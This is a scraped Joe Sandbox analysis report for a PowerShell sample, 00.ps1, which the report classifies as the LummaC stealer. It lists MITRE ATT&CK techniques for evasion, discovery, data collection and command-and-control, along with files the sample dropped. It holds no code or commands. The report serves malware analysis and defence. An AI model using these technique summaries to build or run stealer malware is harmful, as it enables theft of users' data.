Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 00.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\recaptcha-verify[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1oo2103v.evg.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ptbh12j.1nj.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qkvinzt.lrc.ps1

Windows Analysis Report
00.ps1

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre